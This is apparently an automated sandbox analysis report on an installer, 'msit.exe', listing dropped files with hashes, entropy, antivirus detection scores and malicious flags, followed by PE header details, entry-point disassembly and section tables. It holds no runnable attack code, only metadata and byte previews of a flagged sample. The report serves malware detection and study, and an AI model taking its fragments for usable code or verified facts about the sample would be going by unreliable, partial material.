                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):908128
                                                                                                              Entropy (8bit):6.595002426238024
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24576:0yuK7uUCx0bzy5UrkfbDUtF4h0lhSMXlpGyFI/Yk6ibf7:0yuHHUtTZGyFI/Yk6ibf7
                                                                                                              MD5:ACCD9092A35E468E8AF934ACCD81E9F6
                                                                                                              SHA1:3751384E5E586481618002469190E3C1F271CE6D
                                                                                                              SHA-256:8339A5EE92E53A155828E58E7700FC17D4F3F8ECB11DAEB52AA1118BA3141ECD
                                                                                                              SHA-512:18E49E56AD2F78DB7F4BFABAB25CC3ECFCC8180BEEA8FF162A5D80BD0A6DB9EB598F9FA1D5167F078A12F382663A2B205D7E512370E4873A60955A174826E8E3
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R...<..<..<..}?..<..}9...<.x?..<.x8..<..}8..<.x9...<..}:..<..}=..<..=...<..y5...<..y<..<..y...<.....<..y>..<.Rich..<.................PE..L......f.........."!...)............0W..............................................g.....@A.........................................p..h...............`=..............p...............................@.......................@....................text...j........................... ..`.rdata... ......."..................@..@.data...('... ......................@....didat..H....P......................@....fptable.....`......................@....rsrc...h....p......................@..@.reloc..............................@..B................................................................................................................................................................................................
                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1524
                                                                                                              Entropy (8bit):5.508356356630362
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:ILgMV8Tvbdtu64SOu07QrWzdUC+gext8TvgypUPqFP3E6N9Sv8cVSDhiSDxt8TvW:IL36BcuyQrItqtkqOP3tNgvED8SNtX
                                                                                                              MD5:57CEA738D782EE28B790056220CB395E
                                                                                                              SHA1:F6B7DBAD903679EAF2FC9A4BD73BE6DB3297E8E2
                                                                                                              SHA-256:A26FF8EBCC3D162182BF4E390997EC039845D9CAD2CC1A2399C090E94A53E6D4
                                                                                                              SHA-512:EA193E92F541209B0B4DF4E56AA43D6C39FF640D598C033F154BFE8C09C13B53A5E215148796C51E084DCA45E0D1FA44A186C32E46BA90A99DE055C4B6B5579D
                                                                                                              Malicious:false
                                                                                                              Preview:...@IXOS.@.....@S.-Z.@.....@.....@.....@.....@.....@......&.{15630F35-AF86-45E7-B3CF-07A0AC07CAF6}..msit..msit.msi.@.....@.....@.....@........&.{EA6270CA-0126-4785-A430-33ABC9DC920B}.....@.....@.....@.....@.......@.....@.....@.......@......msit......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{86FA086C-1DD0-4082-AC92-FB7682CD7E34}#.C:\Users\user\AppData\Local\Temp\.@.......@.....@.....@......&.{F6D3DE48-10AF-4734-A48F-E26E13947E6F}6.C:\Users\user\AppData\Local\Temp\TeleportPresets.txt.@.......@.....@.....@......&.{39B1484E-9A16-4754-9B1B-81931D13A2A4}d.21:\Software\Caphyon\Advanced Installer\LZMA\{15630F35-AF86-45E7-B3CF-07A0AC07CAF6}\1.0.1\AI_ExePath.@.......@.....@.....@........CreateFolders..Creating folders..Folder: [1]".#.C:\Users\user\AppData\Local\Temp\.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]...@.....@
                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):13084160
                                                                                                              Entropy (8bit):7.767097954057833
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:196608:hL1kxR9F9KENR9N4bQOZNxVs0eb+CwRVu4fpbr7vOSPFjytXwt4TPnqunXcHF91v:uF3zv8Zrqb+CUuubX26jytnTPjnXcBv
                                                                                                              MD5:4D82074854750FDBA89D76624CC1E6F6
                                                                                                              SHA1:1CAB8150956317418F64E67692072CAC8472B75B
                                                                                                              SHA-256:019CF1AAD1F8D4F1B5DAE3AA609B2B53CFFC3C7894B58B9F0B225868AED7342D
                                                                                                              SHA-512:068BD8C1DB17C4DEF612618D463239F002E8F4712691A8FC9163215BDAA7BC5306AA861C396438C647E7B839C2C67C5709B25E0695E1BAA668AA100310255F9D
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              • Antivirus: ReversingLabs, Detection: 63%
                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....[g.........."................X].........@.............................0......g.....`..................................................n..(................2.......................................... e..(......@............q...............................text............................... ..`.rdata............................@..@.data....I....... ..................@....pdata...2.......4..................@..@.fptable.....P......................@....tls.........`......................@..._RDATA.......p......................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                              Category:dropped
                                                                                                              Size (bytes):20480
                                                                                                              Entropy (8bit):1.2024165827474182
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12:JSbX72FjjXAlfLIlHuRpzhG7777777777777777777777777ZDHF9N0ynYcowbrB:JdUIwqRo+F
                                                                                                              MD5:E791010B969957764959617392A4B91A
                                                                                                              SHA1:E772884207D12A3B69E72BADAAED4325F04F1CA7
                                                                                                              SHA-256:FA0A4FFEB5F43928874C5D42AB246AD7BB1523388DF427FBAB7B5B8FA1A1C85B
                                                                                                              SHA-512:101D4A07D5AC01D0638D62A8F24B1CE0CB934E0FF31F6EE5E7E15683268C4DEC80F685D3BAEBC311CD1A981001F999A3A66F5F87BCB930D0C4273F0799BF2858
                                                                                                              Malicious:false
                                                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                              Category:dropped
                                                                                                              Size (bytes):20480
                                                                                                              Entropy (8bit):1.6836575987345794
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:AvB8PhQuRc06WX4SnT5lI2rR3WSXsAEXMGRFDbtM9mSXqTO:AUhQ1CnTzILmnGRxQ
                                                                                                              MD5:58E14BD231E71EEF1D276C0FA03483D2
                                                                                                              SHA1:D73751D16178B38D32B931E1EA17B64BFCC5CD2A
                                                                                                              SHA-256:22F506CD03BE096B2DB9D692497564814C189A2193EC53C931568AC771174F54
                                                                                                              SHA-512:676BF44F1EFD9333EC2EEE700591B0D938E3A9497F6CF0B67BB16582B307EB2147C2CB10484603CC04508DAEA76ACF5AF386F7D7454167BC2989D31589B5E979
                                                                                                              Malicious:false
                                                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):360001
                                                                                                              Entropy (8bit):5.362967270052912
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgaup:zTtbmkExhMJCIpEc
                                                                                                              MD5:2A0D70B725A9470D484B8176AB4EA097
                                                                                                              SHA1:63903DB30C634B018CC2112CCBE67CD9A5830DE7
                                                                                                              SHA-256:256D5518284BDA940F80CBAB6FB39DA8EAA1FB046CD182A0BC8241DA7A9A0C95
                                                                                                              SHA-512:D27A1480E6358A715DA0F37CA9066A2B87BB295A4D1A4C2F0F23DA8CE38DE456B4DFB8A6563FF612BF50725E4D3CCF98606B98A499EAC980CB29A46CD41C1925
                                                                                                              Malicious:false
                                                                                                              Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                              Category:dropped
                                                                                                              Size (bytes):20480
                                                                                                              Entropy (8bit):1.6836575987345794
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:AvB8PhQuRc06WX4SnT5lI2rR3WSXsAEXMGRFDbtM9mSXqTO:AUhQ1CnTzILmnGRxQ
                                                                                                              MD5:58E14BD231E71EEF1D276C0FA03483D2
                                                                                                              SHA1:D73751D16178B38D32B931E1EA17B64BFCC5CD2A
                                                                                                              SHA-256:22F506CD03BE096B2DB9D692497564814C189A2193EC53C931568AC771174F54
                                                                                                              SHA-512:676BF44F1EFD9333EC2EEE700591B0D938E3A9497F6CF0B67BB16582B307EB2147C2CB10484603CC04508DAEA76ACF5AF386F7D7454167BC2989D31589B5E979
                                                                                                              Malicious:false
                                                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):512
                                                                                                              Entropy (8bit):0.0
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3::
                                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                              Malicious:false
                                                                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):32768
                                                                                                              Entropy (8bit):0.09962821282146958
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:xPLG7iVCnLG7iVrKOzPLHKO9NrgEbu1tIWMYcCt2XbPYVky6l0Sa1:50i8n0itFzDHF9N0ynYcowbr0Z1
                                                                                                              MD5:6F1A2F92A8ECD382F77DC249992D76EA
                                                                                                              SHA1:5F3CDA9B7E94305EEE9AC96E389AF8AB66164297
                                                                                                              SHA-256:F434FAB927629CABCAD69C315CA18DBC0CC872E82C4999F4BFBC94528EB3A5C8
                                                                                                              SHA-512:0CEFE5A45DE243C25651113AC85725CDE8F7DF1652EABE3EC8E6710F3D44D3E0D68C973AE1E6A085E3AB9018CB4935B8457602B81B81E2043FD9D9D3A89979EC
                                                                                                              Malicious:false
                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                              File Type:data
                                                                                                              Category:modified
                                                                                                              Size (bytes):512
                                                                                                              Entropy (8bit):0.0
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3::
                                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                              Malicious:false
                                                                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                              Category:dropped
                                                                                                              Size (bytes):32768
                                                                                                              Entropy (8bit):1.339607743296539
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:Lm1YuBvhPIFX4BT53o5I2rR3WSXsAEXMGRFDbtM9mSXqTO:LaYcIiT5KILmnGRxQ
                                                                                                              MD5:788FD3E0775CC59234105B1145F38ED9
                                                                                                              SHA1:91D4F761F88D24CE19200D32492A34E2B146D749
                                                                                                              SHA-256:1B80BCC64DA96560C6C91E2BDB1121E813092160BA3F18B64D3E7C9361E14ECC
                                                                                                              SHA-512:F08AC2733F06750A17EDA22448274AA6CB94281C7E63CF98F8F99C9E9DC3FF039EAF8A18827C1947763AB946CF47932DA579BDE87306C4DCA943262876649AD7
                                                                                                              Malicious:false
                                                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                              Category:dropped
                                                                                                              Size (bytes):32768
                                                                                                              Entropy (8bit):1.339607743296539
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:Lm1YuBvhPIFX4BT53o5I2rR3WSXsAEXMGRFDbtM9mSXqTO:LaYcIiT5KILmnGRxQ
                                                                                                              MD5:788FD3E0775CC59234105B1145F38ED9
                                                                                                              SHA1:91D4F761F88D24CE19200D32492A34E2B146D749
                                                                                                              SHA-256:1B80BCC64DA96560C6C91E2BDB1121E813092160BA3F18B64D3E7C9361E14ECC
                                                                                                              SHA-512:F08AC2733F06750A17EDA22448274AA6CB94281C7E63CF98F8F99C9E9DC3FF039EAF8A18827C1947763AB946CF47932DA579BDE87306C4DCA943262876649AD7
                                                                                                              Malicious:false
                                                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):512
                                                                                                              Entropy (8bit):0.0
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3::
                                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                              Malicious:false
                                                                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):512
                                                                                                              Entropy (8bit):0.0
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3::
                                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                              Malicious:false
                                                                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):512
                                                                                                              Entropy (8bit):0.0
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3::
                                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                              Malicious:false
                                                                                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                              Category:dropped
                                                                                                              Size (bytes):20480
                                                                                                              Entropy (8bit):1.6836575987345794
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:AvB8PhQuRc06WX4SnT5lI2rR3WSXsAEXMGRFDbtM9mSXqTO:AUhQ1CnTzILmnGRxQ
                                                                                                              MD5:58E14BD231E71EEF1D276C0FA03483D2
                                                                                                              SHA1:D73751D16178B38D32B931E1EA17B64BFCC5CD2A
                                                                                                              SHA-256:22F506CD03BE096B2DB9D692497564814C189A2193EC53C931568AC771174F54
                                                                                                              SHA-512:676BF44F1EFD9333EC2EEE700591B0D938E3A9497F6CF0B67BB16582B307EB2147C2CB10484603CC04508DAEA76ACF5AF386F7D7454167BC2989D31589B5E979
                                                                                                              Malicious:false
                                                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                              Category:dropped
                                                                                                              Size (bytes):32768
                                                                                                              Entropy (8bit):1.339607743296539
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:Lm1YuBvhPIFX4BT53o5I2rR3WSXsAEXMGRFDbtM9mSXqTO:LaYcIiT5KILmnGRxQ
                                                                                                              MD5:788FD3E0775CC59234105B1145F38ED9
                                                                                                              SHA1:91D4F761F88D24CE19200D32492A34E2B146D749
                                                                                                              SHA-256:1B80BCC64DA96560C6C91E2BDB1121E813092160BA3F18B64D3E7C9361E14ECC
                                                                                                              SHA-512:F08AC2733F06750A17EDA22448274AA6CB94281C7E63CF98F8F99C9E9DC3FF039EAF8A18827C1947763AB946CF47932DA579BDE87306C4DCA943262876649AD7
                                                                                                              Malicious:false
                                                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):73728
                                                                                                              Entropy (8bit):0.18122162238988607
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:PaJTxtmipVtktRFdWipVtsAEVtMG+l8T4gC2rhKiVPpG+ItQH5MFI+Z5Tu6:SJTbmSX8R3WSXsAEXMGRFDbtMFIi
                                                                                                              MD5:FBCD81C4FBCAB01F71828A6110D0753B
                                                                                                              SHA1:AFAB92D26B19F1504A0EFC582EDF2079A7BD4C18
                                                                                                              SHA-256:3ECF8FCCE2F1AE29752446C010FB5D19770C5B421CC8DA20DD8C424B22147097
                                                                                                              SHA-512:0E9D97829ABA271882963486EFDC967D44E060ACCC1AE63CEE966BA903F58924EBD27F5AC0E12EC3A2C925FD04AA918DCD629501314A49A0EA32CB66F8F925A0
                                                                                                              Malicious:false
                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Entropy (8bit):7.875224146026472
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                              File name:msit.exe
                                                                                                              File size:20'182'372 bytes
                                                                                                              MD5:bb0ca87d28e7c1bfd53e3e592e75e684
                                                                                                              SHA1:23be4528fe7dd78243845a6a08a88ce68200d59a
                                                                                                              SHA256:d34e7af4d266688eb65118de606ffbeb36d46d488c3be604a5cb240778550cea
                                                                                                              SHA512:217effd932ae2b5e21527bcc7a22c0f8a8ae0d89902ef00669ef9cc11463995c8c48d34d0b75b55dd50421c2abf19e8b72289abfbb7757339f825fe6ccdb59a7
                                                                                                              SSDEEP:393216:kxVUrUl7eOos7orHgF4n5tZkk5b4EMqbfhYwWMr220ItXVca6cjL6OcaAeEKQHeg:CVUrUl7eOuTg4VkDEMq1YpItB6YOO1Af
                                                                                                              TLSH:8A171221764AC4EBED6911F0193C9AAA852C6D3B1B6118D7B3DC6D6E17740C38633E3B
                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Z...4...4...4...1.S.4...2...4...7...4...0...4...1...4...7...4...0...4...5...4...3...4...5.g.4...=...4.......4.......4...6...4
                                                                                                              Icon Hash:010905619293c52c
                                                                                                              Entrypoint:0x631960
                                                                                                              Entrypoint Section:.text
                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                              Time Stamp:0x66FBEEB8 [Tue Oct 1 12:44:40 2024 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:6
                                                                                                              OS Version Minor:0
                                                                                                              File Version Major:6
                                                                                                              File Version Minor:0
                                                                                                              Subsystem Version Major:6
                                                                                                              Subsystem Version Minor:0
                                                                                                              Import Hash:bf586bdf1219cc9e9d753db3e77887ee
                                                                                                              Instruction
                                                                                                              call 00007F2490C3BC8Bh
                                                                                                              jmp 00007F2490C3B2EDh
                                                                                                              mov ecx, dword ptr [ebp-0Ch]
                                                                                                              mov dword ptr fs:[00000000h], ecx
                                                                                                              pop ecx
                                                                                                              pop edi
                                                                                                              pop edi
                                                                                                              pop esi
                                                                                                              pop ebx
                                                                                                              mov esp, ebp
                                                                                                              pop ebp
                                                                                                              push ecx
                                                                                                              ret
                                                                                                              mov ecx, dword ptr [ebp-10h]
                                                                                                              xor ecx, ebp
                                                                                                              call 00007F2490C3AA47h
                                                                                                              jmp 00007F2490C3B452h
                                                                                                              push eax
                                                                                                              push dword ptr fs:[00000000h]
                                                                                                              lea eax, dword ptr [esp+0Ch]
                                                                                                              sub esp, dword ptr [esp+0Ch]
                                                                                                              push ebx
                                                                                                              push esi
                                                                                                              push edi
                                                                                                              mov dword ptr [eax], ebp
                                                                                                              mov ebp, eax
                                                                                                              mov eax, dword ptr [007820C0h]
                                                                                                              xor eax, ebp
                                                                                                              push eax
                                                                                                              push dword ptr [ebp-04h]
                                                                                                              mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                              lea eax, dword ptr [ebp-0Ch]
                                                                                                              mov dword ptr fs:[00000000h], eax
                                                                                                              ret
                                                                                                              push eax
                                                                                                              push dword ptr fs:[00000000h]
                                                                                                              lea eax, dword ptr [esp+0Ch]
                                                                                                              sub esp, dword ptr [esp+0Ch]
                                                                                                              push ebx
                                                                                                              push esi
                                                                                                              push edi
                                                                                                              mov dword ptr [eax], ebp
                                                                                                              mov ebp, eax
                                                                                                              mov eax, dword ptr [007820C0h]
                                                                                                              xor eax, ebp
                                                                                                              push eax
                                                                                                              mov dword ptr [ebp-10h], eax
                                                                                                              push dword ptr [ebp-04h]
                                                                                                              mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                              lea eax, dword ptr [ebp-0Ch]
                                                                                                              mov dword ptr fs:[00000000h], eax
                                                                                                              ret
                                                                                                              push eax
                                                                                                              push dword ptr fs:[00000000h]
                                                                                                              lea eax, dword ptr [esp+0Ch]
                                                                                                              sub esp, dword ptr [esp+0Ch]
                                                                                                              push ebx
                                                                                                              push esi
                                                                                                              push edi
                                                                                                              mov dword ptr [eax], ebp
                                                                                                              mov ebp, eax
                                                                                                              mov eax, dword ptr [007820C0h]
                                                                                                              xor eax, ebp
                                                                                                              push eax
                                                                                                              mov dword ptr [ebp-10h], esp
                                                                                                              push dword ptr [ebp-04h]
                                                                                                              mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                              lea eax, dword ptr [ebp-0Ch]
                                                                                                              mov dword ptr fs:[00000000h], eax
                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x380c700x3c.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x3920000x2fa70.rsrc
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x3c20000x30668.reloc
                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x31df1c0x70.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x31dfc00x18.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2ed3d00x40.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x2c70000x348.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x37df340x240.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                              .text0x10000x2c57ca0x2c5800380eea416b4c49312a5c8286c01b4064unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                              .rdata0x2c70000xbaf980xbb00076d9a806840fa1b0d85e274708829c84False0.3255177870153743PEX Binary Archive5.068606859404956IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                              .data0x3820000xd9600x36003218144f404d047556acfc87dc4dc877False0.2339409722222222dBase III DBT, version number 0, next free block index 2, 1st item "T"x"4.467231983876358IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .didat0x3900000x70c0x800040200ef5edc5b299fac3839947e3015False0.41162109375data4.648805056387306IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .fptable0x3910000x800x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .rsrc0x3920000x2fa700x2fc004f793859b16bf05cbc7b417183359276False0.11481000490837696data5.128026163629013IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                              .reloc0x3c20000x306680x3080070c4f913553752a0f8a4e9db7b74cbe4False0.4799704010953608data6.572194138609192IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                              RT_BITMAP0x3929100x13eDevice independent bitmap graphic, 32 x 16 x 4, image size 258, resolution 2834 x 2834 px/m, 5 important colorsEnglishUnited States0.25471698113207547
                                                                                                              RT_BITMAP0x392a500x828Device independent bitmap graphic, 32 x 16 x 32, image size 0EnglishUnited States0.03017241379310345
                                                                                                              RT_BITMAP0x3932780x48a8Device independent bitmap graphic, 290 x 16 x 32, image size 0EnglishUnited States0.11881720430107527
